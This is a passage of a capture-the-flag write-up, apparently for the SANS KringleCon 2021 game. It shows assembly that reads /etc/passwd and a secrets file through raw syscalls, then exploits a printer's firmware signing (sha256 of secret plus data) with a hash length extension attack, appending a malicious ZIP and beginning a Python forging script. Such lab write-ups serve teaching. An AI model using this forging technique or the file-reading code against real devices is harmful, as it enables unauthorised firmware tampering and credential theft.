&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; TODO: Get a reference to this string into the correct register&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;call&lt;/span&gt; &lt;span class="no"&gt;get_file_name_addr&lt;/span&gt;
&lt;/span&gt;&lt;span class="nf"&gt;db&lt;/span&gt; &lt;span class="err"&gt;&amp;#39;/&lt;/span&gt;&lt;span class="no"&gt;etc&lt;/span&gt;&lt;span class="err"&gt;/&lt;/span&gt;&lt;span class="no"&gt;passwd&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="nl"&gt;get_file_name_addr:&lt;/span&gt;

&lt;span class="c"&gt;; Set up a call to sys_open&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rax to the correct syscall number&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rdi to the first argument (the filename)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;pop&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rsi to the second argument (flags - 0 is fine)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rsi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rdx to the third argument (mode - 0 is also fine)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; Perform the syscall&lt;/span&gt;
&lt;span class="nf"&gt;syscall&lt;/span&gt;

&lt;span class="c"&gt;; syscall sets rax to the file handle, so to return the file handle we don&amp;#39;t&lt;/span&gt;
&lt;span class="c"&gt;; need to do anything else!&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="reading-a-file"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id33"&gt;11. Reading a File&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Finally, we're going to read the content of a file! The goal is to read the
content of &lt;code&gt;/var/northpolesecrets.txt&lt;/code&gt;. We're told to do so in four
steps:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;A call to &lt;code&gt;sys_open&lt;/code&gt; to get a file descriptor to
&lt;code&gt;/var/northpolesecrets.txt&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;A call to &lt;code&gt;sys_read&lt;/code&gt; to read the file and put its content in
&lt;code&gt;rsp&lt;/code&gt; (&lt;em&gt;i.e.&lt;/em&gt; the stack).&lt;/li&gt;
&lt;li&gt;A call to &lt;code&gt;sys_write&lt;/code&gt; to write the content of the file from the
stack to &lt;code&gt;stdout&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;A call to &lt;code&gt;sys_exit&lt;/code&gt; to exit properly.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, &lt;code&gt;sys_read&lt;/code&gt; takes the length to read as an argument, but we don't
know the length of the content of &lt;code&gt;/var/northpolesecrets.txt&lt;/code&gt;
beforehand. The tutorial tells us to &amp;quot;experiment to find the right
&lt;code&gt;count&lt;/code&gt;&amp;quot;, and that &amp;quot;if it's a bit too high, that's perfectly fine&amp;quot;. So
let's hardcode a large value, such as 1000:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; TODO: Get a reference to this&lt;/span&gt;
&lt;span class="nf"&gt;call&lt;/span&gt; &lt;span class="no"&gt;get_file_name_addr&lt;/span&gt;
&lt;span class="nf"&gt;db&lt;/span&gt; &lt;span class="err"&gt;&amp;#39;/&lt;/span&gt;&lt;span class="no"&gt;var&lt;/span&gt;&lt;span class="err"&gt;/&lt;/span&gt;&lt;span class="no"&gt;northpolesecrets.txt&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Call sys_open&lt;/span&gt;
&lt;span class="nl"&gt;get_file_name_addr:&lt;/span&gt;

&lt;span class="nf"&gt;pop&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt; &lt;span class="c"&gt;; we get the address of the file name&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rsi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="c"&gt;; flag for sys_open&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="c"&gt;; mode for sys_open&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="c"&gt;; syscall number for sys_open&lt;/span&gt;

&lt;span class="nf"&gt;syscall&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Call sys_read on the file handle and read it into rsp&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt; &lt;span class="c"&gt;; we store the file descriptor in rdi&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rsi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;rsp&lt;/span&gt; &lt;span class="c"&gt;; we read the file to rsp, i.e. the stack&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt; &lt;span class="c"&gt;; count value for sys_read&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="c"&gt;; syscall number for sys_read&lt;/span&gt;

&lt;span class="nf"&gt;syscall&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Call sys_write to write the contents from rsp to stdout (1)&lt;/span&gt;
&lt;span class="c"&gt;; NB: we don&amp;#39;t have to set rdx because it was already set to 1000 during&lt;/span&gt;
&lt;span class="c"&gt;; the syscall to sys_read&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="c"&gt;; file descriptor of stdout&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="c"&gt;; syscall number for sys_write&lt;/span&gt;

&lt;span class="nf"&gt;syscall&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Call sys_exit&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="c"&gt;; return value for sys_exit&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt; &lt;span class="c"&gt;; syscall number for sys_exit&lt;/span&gt;

&lt;span class="nf"&gt;syscall&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We execute our code and get the content of &lt;code&gt;/var/northpolesecrets.txt&lt;/code&gt;
(plus some garbage that was on the stack) written to &lt;code&gt;stdout&lt;/code&gt;! The
content of the file is:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Secret to KringleCon success: all of our speakers and organizers, providing the gift of cyber security knowledge, free to the community.&lt;/code&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-7-printer-exploitation"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id34"&gt;Objective 7: Printer Exploitation&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;In Jack's office, we find &lt;a class="reference external" href="https://printer.kringlecastle.com/"&gt;a printer that was stolen from Santa's castle&lt;/a&gt;.
We're told to get shell access on this printer and to get the content of
&lt;code&gt;/var/spool/printer.log&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;There isn't much we can do in the web interface, because most functionalities
require a password to be accessed. However, we have access to the firmware
update functionality. We can update the printer's firmware, and download
the current firmware, exported as a JSON file called
&lt;code&gt;firmware-export.json&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;firmware&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;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&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;signature&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;secret_length&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;algorithm&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SHA256&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we have the base64-encoded firmware. There's also a signature, and what
are most likely parameters to generate said signature: the algorithm, and the
length of the secret. Of course, the secret itself is not in the export.&lt;/p&gt;
&lt;p&gt;Let's decode the firmware and see what form it has. I'm using &lt;code&gt;jq&lt;/code&gt;
because I'm a hipster, but you can just copy/paste the string to a file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; jq &lt;span class="s1"&gt;&amp;#39;.firmware&amp;#39;&lt;/span&gt; &amp;lt; firmware-export.json &lt;span class="p"&gt;|&lt;/span&gt; tr -d &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &amp;gt; firmware
&lt;span class="gp"&gt;$&lt;/span&gt; file firmware
&lt;span class="go"&gt;firmware: Zip archive data, at least v2.0 to extract&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, it's a ZIP archive. Let's extract it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; mv firmware&lt;span class="o"&gt;{&lt;/span&gt;,.zip&lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; unzip firmware.zip
&lt;span class="go"&gt;Archive:  firmware.zip&lt;/span&gt;
&lt;span class="go"&gt;  inflating: firmware.bin&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; file firmware.bin
&lt;span class="go"&gt;firmware.bin: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fc77960dcdd5219c01440f1043b35a0ef0cce3e2, not stripped&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It simply contains a 64-bit ELF executable called &lt;code&gt;firmware.bin&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So, the idea would be to modify our firmware so that we can introduce a
backdoor, update the printer, and get a shell. But, there is the small matter
of the signature: the printer won't accept our malicious firmware if it's not
properly signed. Let's take our original &lt;code&gt;firmware-export.json&lt;/code&gt; and
modify the &lt;code&gt;signature&lt;/code&gt; field to see what happens:&lt;/p&gt;
&lt;img alt="The web interface sends the following message: &amp;quot;Something went wrong! Firmware update failed. Failed to verify the signature! Make sure you are signing the data correctly: sha256(&amp;lt;secret&amp;gt; + raw_file_data)" class="align-center" src="/images/sans-christmas-challenge-2021/printer_bad_signature.png" /&gt;
&lt;p&gt;Ha! We now know how the signature is computed:
&lt;code&gt;sha256(&amp;lt;secret&amp;gt; + raw_file_data)&lt;/code&gt;. This is interesting, because this
kind of signature schema is vulnerable to &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Length_extension_attack"&gt;length extension attacks&lt;/a&gt;.
This is because SHA256 follows the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction"&gt;Merkle–Damgård construction&lt;/a&gt;.
It's actually something I exploited in &lt;a class="reference external" href="/posts/2012/12/09/stripe-ctf-level-7/"&gt;a previous CTF challenge&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Basically, if we know:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;data&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sha256(secret + data)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The length of &lt;code&gt;secret&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can compute &lt;code&gt;sha256(secret + data + modifier + additional_data)&lt;/code&gt;. This
would allow us to append data to the ZIP file. But how will that allow us to
add a backdoor to the firmware? Well, ZIP files are analyzed backwards. Here's
an explanation image from &lt;a class="reference external" href="https://twitter.com/corkami"&gt;&amp;#64;corkami&lt;/a&gt; (him
again):&lt;/p&gt;
&lt;img alt="A schema explaining the ZIP format. It is quite complex, but the interesting part is how the parsing is done. The archive is analyzed backwards. 1. the End of the Central Directory is located (by scanning) and parsed. 2. the Central Directory is located, and parsed. 3. each Local File Header is parsed." class="align-center" src="/images/sans-christmas-challenge-2021/corkami_zip_file.png" /&gt;
&lt;p&gt;This means that we can just add a malicious ZIP file at the end of our original
firmware ZIP file. The malicious ZIP file will be parsed, and the original
ZIP file will be ignored.&lt;/p&gt;
&lt;p&gt;Here's some basic commands to check this fact out:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; foo &amp;gt; foo.txt
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; bar &amp;gt; bar.txt
&lt;span class="gp"&gt;$&lt;/span&gt; zip foo.zip foo.txt
&lt;span class="go"&gt;  adding: foo.txt (stored 0%)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; zip bar.zip bar.txt
&lt;span class="go"&gt;  adding: bar.txt (stored 0%)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat foo.zip bar.zip &amp;gt; concat.zip
&lt;span class="gp"&gt;$&lt;/span&gt; rm foo.txt bar.txt
&lt;span class="gp"&gt;$&lt;/span&gt; unzip concat.zip
&lt;span class="go"&gt;Archive:  concat.zip&lt;/span&gt;
&lt;span class="go"&gt;warning [concat.zip]:  168 extra bytes at beginning or within zipfile&lt;/span&gt;
&lt;span class="go"&gt;  (attempting to process anyway)&lt;/span&gt;
&lt;span class="go"&gt; extracting: bar.txt&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat bar.txt
&lt;span class="go"&gt;bar&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It works! This means that we can now try to backdoor our ZIP file. I found a
Python library called &lt;a class="reference external" href="https://github.com/stephenbradshaw/hlextend"&gt;hlextend&lt;/a&gt;
that can be used to perform hash length extension attacks against SHA1, SHA256,
and SHA512. Perfect!&lt;/p&gt;
&lt;p&gt;Here's the forging code (&lt;code&gt;hlextend&lt;/code&gt; is written in Python 2, and so is
this code, unfortunately):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python2&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;base64&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;hlextend&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# Argument parsing&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;usage: {} &amp;lt;firmware-export.json&amp;gt; &amp;lt;zip_file_to_append&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
        &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We parse the original firmware-export.json&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;firmware_export&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

    &lt;span class="c1"&gt;# We open our malicious ZIP file&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;file_to_append_content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We get the original information from firmware-export.json&lt;/span&gt;
    &lt;span class="n"&gt;original_firmware&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;firmware_export&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;firmware&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="n"&gt;original_sig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;firmware_export&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;signature&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
